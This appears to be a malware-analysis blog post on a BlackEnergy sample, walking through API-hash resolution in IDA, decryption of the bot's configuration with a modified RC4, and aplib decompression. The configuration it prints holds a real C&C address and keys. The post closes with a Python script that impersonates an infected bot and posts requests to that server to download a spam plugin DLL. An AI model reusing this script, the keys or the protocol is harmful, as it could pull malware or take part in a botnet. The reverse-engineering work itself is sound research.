Last week, I wanted to do some RE so I picked a sample called 11.exe which md5’s signature is 92c52a4e6dda119e73240b17100abf1f (4116da5e629e1fad70ee415f9739af5b after unpacking). I’m not going to detail the unpacking process since it is a classic runPE. In this article I’m going to explain how to extract the configuration and how to trigger the C&C to grab plugins.
IDA idb (v6.4) here
When you open the sample within IDA, we directly notice that it includes very little imports. Directly at the start, we can see the following pattern numerous times:
The first push is a “hash”, it calls a function that returns an address and directly calls eax.
So we can call the function: GetProcByHash. First, we have to identify the “hash” function. We look at the function GetProcByHash (40162Eh).
At the begining of a loop, we notice a call. This call seems to be interesting.
No doubt, it is the “hash” function.
We now face multiple solutions:
I chose the second option and created code to enumerate all exported names in ASM.
The code just takes a dll name in input and then loads it and compute “hash” for each exported function. Code available here
$ wine buildhash.exe kernel32.dll | head
AcquireSRWLockExclusive 0x593cb506
AcquireSRWLockShared 0x3634926f
ActivateActCtx 0x5147f60f
AddAtomA 0x1e1865e5
AddAtomW 0x1e1865f3
AddConsoleAliasA 0x06dc97e5
AddConsoleAliasW 0x06dc97f3
...
We computed hashes for couple windows library (kernel32.dll, user32.dll, advapi32.dll, ntdll.dll, ws2_32.dll, wininet.dll ). Now we have to import them in IDA as an enumeration.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import idaapi
from idaapi import Choose2
id = idc.AddEnum(0, "import", idaapi.hexflag())
for line in open('hash_list','r').readlines():
line = line.strip('\n')
(name, hash) = line.split(' ')
hash = int(hash, 16)
idc.AddConstEx(id, "hash_%s" % (name), hash, idaapi.BADADDR)
During the writing of this small IDA script I found some other elegant solutions
https://www.mandiant.com/blog/precalculated-string-hashes-reverse-engineering-shellcode/
After using the script, we can press the button “m” to get the function name.
Now we can really start to work.
By scrolling in the data, something looks suspicious: a block of data of 264len with a reference as the beginning.
By showing the reference, we arrived to the function 4058ACh (DecConfigStartThrAndWait). It pushes the config in arg0 of the function 4029ECh (decode_config)
This loop has 2 interesting calls:
To have a better point of view, I extracted the config from the binary
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
if __name__ == "__main__":
fp = open(sys.argv[1])
fp.seek(0x65C8)
sys.stdout.write(fp.read(264))
./python extract_config.py 11.u.exe | hd
00000000 60 01 00 00 e7 00 00 00 10 00 00 00 00 00 00 00 |`...............|
00000010 5c f6 ee 79 2c df 05 e1 ba 2b 63 25 c4 1a 5f 10 |\..y,....+c%.._.|
00000020 2b 83 08 14 6f f3 42 18 d7 15 42 50 83 48 fc 47 |+...o.B...BP.H.G|
00000030 05 8b bc 78 97 12 45 f9 0d a4 3d 77 fa e9 7c e0 |...x..E...=w..|.|
00000040 96 fd a6 16 5b 4b a5 79 8e 72 53 8c 56 9c 13 36 |....[K.y.rS.V..6|
00000050 fb de 84 48 ca 06 01 46 ee bf 9f e0 b3 c4 8b 0f |...H...F........|
00000060 ec c5 5d 0d 61 52 9d 87 ca 71 46 70 3a fe b1 a7 |..].aR...qFp:...|
00000070 26 5f ae 0c d4 01 5d e7 c6 8c c1 9d 96 3d 79 da |&_....]......=y.|
00000080 ed 5f d0 ff ae 3b 97 1c 50 01 ca 98 fb eb b0 58 |._...;..P......X|
00000090 d3 17 b8 4d 90 e9 ef 8d f0 9f 04 2c c9 31 b8 a1 |...M.......,.1..|
000000a0 29 9a ff bb 16 ee 97 22 9c 84 f1 58 c7 9d 8f 8d |)......"...X....|
000000b0 8e 0b b2 89 c0 e8 58 e2 e7 85 18 4f bd a7 49 ed |......X....O..I.|
000000c0 8f d8 0f 0d 8a 38 4e 56 3b 72 03 96 01 06 40 68 |.....8NV;r....@h|
000000d0 9d c0 a6 94 c1 10 ad c0 7d 01 e0 2e c0 71 c1 f6 |........}....q..|
000000e0 3f 76 7b ac 2e a8 5d bf 8d 97 46 aa 4f f5 15 a1 |?v{...]...F.O...|
000000f0 fb 25 ce fe c6 f7 30 93 85 e2 06 ee 53 c7 12 77 |.%....0.....S..w|
00000100 d9 b0 d4 46 ee a0 33 00 |...F..3.|
By looking at the code, we can extract the structure used by the config data
------------ ------------------------------------------------- ----------------
**Offset** **Value** **Comment**
0x00 0x0160 Final len
0x4 0xe7 Compressed len
0x8 0x10 Key len
0x10 5c f6 ee 79 2c df 05 e1 ba 2b 63 25 c4 1a 5f 10 Key value
0x20 config data
------------ ------------------------------------------------- ----------------
Now we have to identify the encryption algorithm.
By looking at the first call, we notices that it looks like RC4 KSA but with a tiny modification.
Orignal RC4 pseudo code from wiki
for i from 0 to 255
S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j + S[i] + key[i mod keylength]) mod 256
swap values of S[i] and S[j]
endfor
Blackenergy RC4 init code
def rc4_init(key)
box = range(256)
for i in range(256):
box[i] = (box[i] ^ ord(key[i % len(key)])) % 256
return box
The PRGA is the same than RC4 from wiki.
With this information we can write a script to decode the configuration
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import string
def arc4(key, data):
x = 0
box = range(256)
for i in range(256):
box[i] = (box[i] ^ ord(key[i % len(key)])) % 256
x = y = 0
out = []
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
return ''.join(out)
if __name__ == "__main__":
fp = open(sys.argv[1])
fp.seek(0x10)
key = fp.read(0x10)
data = fp.read()
data = arc4(key, data)
sys.stdout.write(data)
./python decode_config.py config | hd
00000000 3c 00 3f 78 6d 6c 20 76 65 72 00 73 69 6f 6e 3d |<.?xml ver.sion=|
00000010 22 31 2e 74 30 fd f7 cb 63 e3 64 ff e6 67 1e 6f |"1.t0...c.d..g.o|
00000020 77 0c 3e fa 83 73 2d 31 32 35 9f d0 3f 3e 0d 0a |w.>..s-125..?>..|
00000030 19 3c 62 6b 56 6e cd 6c 9c 17 20 7e b4 73 18 11 |.<bkVn.l.. ~.s..|
00000040 3a 0d 47 0f 43 0e 61 21 74 79 70 ff f3 68 b7 7e |:.G.C.a!typ..h.~|
00000050 de 95 2f 0b 47 19 1c 61 64 50 72 c7 3a 2f 10 38 |../.G..adPr.:/.8|
00000060 34 2e 32 e3 cc 31 30 dd 0e 1e 36 7f 83 77 68 69 |4.2..10...6..whi|
00000070 74 65 b1 61 72 d7 b9 63 6c e0 73 2e 7f 70 d0 79 |te.ar..cl.s..p.y|
00000080 2e 43 3c 68 1a 64 68 0d 34 26 29 11 19 84 f8 63 |.C<h.dh.4&)....c|
00000090 6d 53 64 0a 29 2f 0b 48 69 14 5f b7 3f 79 01 31 |mSd.)/.Hi._.?y.1|
000000a0 37 36 33 35 34 ba 04 f8 c7 08 30 39 cf 7f ba f6 |76354.....09....|
000000b0 df e8 f1 18 32 38 df 97 d7 33 ef 1f 76 02 70 8e |....28...3..v.p.|
000000c0 2e 8c e2 83 86 df f3 66 72 fb 71 fb 33 42 d6 0d |.......fr.q.3B..|
000000d0 91 1c 01 62 75 69 6c 64 5f d3 9f e6 30 6f 8e 0d |...build_...0o..|
000000e0 8b 97 53 1c 26 98 00 13 |..S.&...|
000000e8
As you can see, the data seems to be compress. It’s the reason of the final len in the structure. After the RC4 decryption process, the program calls the function located at 402AE9h (inflate). To decompress the config, I decide to rip the code since I’ve no clue what the algo is.
To rip the code, I opened the binary and directly read the asm and treated it like a classic shellcode.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
/* gcc -m32 -fno-stack-protector -z execstack -o rip rip.c */
typedef void (*finflate)(char *src, char *dst);
int main(int argc, char *argv[]){
FILE *fp;
char sc_inflate[0x14F];
char inf[0x1000];
char def[0x1000];
int len;
if(argc != 3){
fprintf(stderr, "%s <11.u.exe> <config>", argv[0]);
return EXIT_FAILURE;
}
fp = fopen(argv[1], "r");
fseek(fp, 0x1ee9, SEEK_SET);
len = fread(sc_inflate, 1, sizeof(sc_inflate), fp);
finflate inflate = (finflate)sc_inflate;
fclose(fp);
fp = fopen(argv[2], "r");
len = fread(def, 1, sizeof(def), fp);
fclose(fp);
inflate(def, inf);
printf("%s", inf);
/*fwrite(inf, 1, sizeof(inf), stdout);*/
return EXIT_SUCCESS;
}
A second method consist of using the library aplib.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include "aplib.h"
int main(int argc, char *argv[]){
unsigned int size, size2;
char *src, *dst, *workmem;
FILE *fp;
fp = fopen(argv[1], "r");
fseek(fp, 0, SEEK_END);
size = ftell(fp);
fseek(fp, 0, SEEK_SET);
src = malloc(size);
size2 = fread(src, 1, size, fp);
fclose(fp);
dst = malloc(size2*4);
size = aP_depack_asm(src, dst);
fp = fopen(argv[2], "w");
fwrite(dst, 1, size, fp);
fclose(fp);
return EXIT_SUCCESS;
}
This output:
./aplib/decompress config.dec config.dec.out
cat config.dec.out
<?xml version="1.0" encoding="windows-1251"?>
<bkernel>
<servers>
<server>
<type>http</type>
<addr>http://84.22.104.162/white/articles.php</addr>
</server>
</servers>
<cmds>
</cmds>
<http_key>17635454375409656001655428185364111</http_key>
<sleepfreq>3</sleepfreq>
<build_id>01</build_id>
</bkernel>
I failed, I did not save the pcap file and then when I decided to write this article, the C&C was already down…
It communicates using the HTTP protocol by sending POST requests.
The POST contains one parameter called “hnp”.
“hnp” contains the real param encrypted with the key fond in config and encoded in hex format.
The param to grab the plugin config is
id=B595735B55773320500E7F8202B118F5&ln=en&cn=US&nt=2600&bid=01
It returns the configuration encrypted in RC4 using the id parameter as the key. I do not have a backup of the plugin configuration but it contains the name of the plugin with its version, parameters and key.
getp=s&id=B595735B55773320500E7F8202B118F5&ln=en&cn=US&nt=2600&bid=01
It returns a DLL encrypted with RC4 using the key specified in the configuration receive before.
Little script to trigger the C&C and grab the configuration or the plugin:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import string
import itertools
import requests
def arc4(key, data):
x = 0
box = range(256)
for i in range(256):
box[i] = (box[i] ^ ord(key[i % len(key)])) % 256
x = y = 0
out = []
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
return ''.join(out)
if __name__ == "__main__":
headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)'}
server_key = "17635454375409656001655428185364111"
client_key = "B595735B55773320500E7F8202B118F5"
plugin_key = "e69ac82a011a69ce912500ea78e95dd4"
get_module_s = "getp=s&id=%s&ln=en&cn=US&nt=2600&bid=01" % (client_key)
get_config = "id=%s&ln=en&cn=US&nt=2600&bid=01" % (client_key)
payload = {'hnp': arc4(server_key, get_config).encode('hex')}
r = requests.post("http://84.22.104.162/white/articles.php", data=payload, headers=headers)
data = arc4(client_key, r.content)
sys.stdout.write(data)
When the C&C was up, only one plugin was distributed and it was called “s”.
./md5sum s.dll
e01810f4cedbaf045cd625b82ec05c62 s.dll
I not going to reverse the plugin but it’s a classic plugin used to send spam. It checks if the infected machine can access some well known SMTP servers like hotmail.com, google.com, mail.com. If it manages to connect to one of those server it will fetch the email and template from the C&C server.